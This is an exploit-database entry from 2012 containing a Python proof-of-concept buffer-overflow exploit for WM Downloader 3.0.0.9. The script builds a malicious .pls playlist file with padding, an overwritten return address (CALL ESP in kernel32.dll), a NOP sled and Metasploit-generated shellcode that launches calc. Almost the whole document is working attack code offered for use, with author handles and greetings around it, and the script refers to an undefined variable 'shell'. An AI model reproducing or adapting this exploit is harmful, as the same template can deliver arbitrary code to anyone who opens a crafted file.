WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit

EKU-ID: 1880	CVE:	OSVDB-ID:
Author: Tunisian spl01t3r	Published: 2012-04-10	Verified:
Download:
Rating

☆☆☆☆☆
#+----------------------------------------------------------------------+
# Exploit Title: WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Tested on: windows XP sp2
# Greetz: Milw0rm 1337day.com
# 
#	 ____ (_) ____   ___
#	(  _ \| |(  _ \ / _ \
#	| | | | || | | x |_|
#	| ||_/|_|| ||_/ \___/
#	|_|      |_|
#	 _ 
#	(_)  ____   ____  ____     _____ 
#	| | /  __| /  __| \__ \   /  `  \ 
#	| | \___ \ \___ \  / _ \_ | Y Y  \
#	|_| |____/ |____/ (___  / |_|_|  /
#						  \/       \/                          
+----------------------------------------------------------------------+
#!/usr/bin/python

import sys,os
print "###############################################"
print "#           WM Downloader 3.0.0.9             #"
print "#             Tunisian_spl01t3r               #"
print "#           tn.spl01t3r@gmail.com             #"
print "#             fb.com/TN.spl0it3r              #"
print "###############################################\r\n"

file=open('iss.pls','w')
buffer="\x41" * 26113   
eip="\xF0\x69\x83\x7C"   # 7C8369F0 CALL ESP kernel32.dll
nops="\x90" * 30     

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
shellcode = (
	"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
	"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
	"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
	"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
	"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
	"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
	"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
	"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
	"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
	"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")
	   
file.write(buffer+eip+nops+shellcode)
print "\n [+] 3vil File Created  \n\n"
print "\n   enj0y ;)  \n\n"
print shell
raw_input("[+] Press any key to exit...")
file.close()


#+----------------------------------------------------------------------+
#[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
#       jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
#	   
#	                      mAhna mAhna 
#	   
#[+] profile :  www.facebook.com/TN.spl0it3r    
#
#+----------------------------------------------------------------------+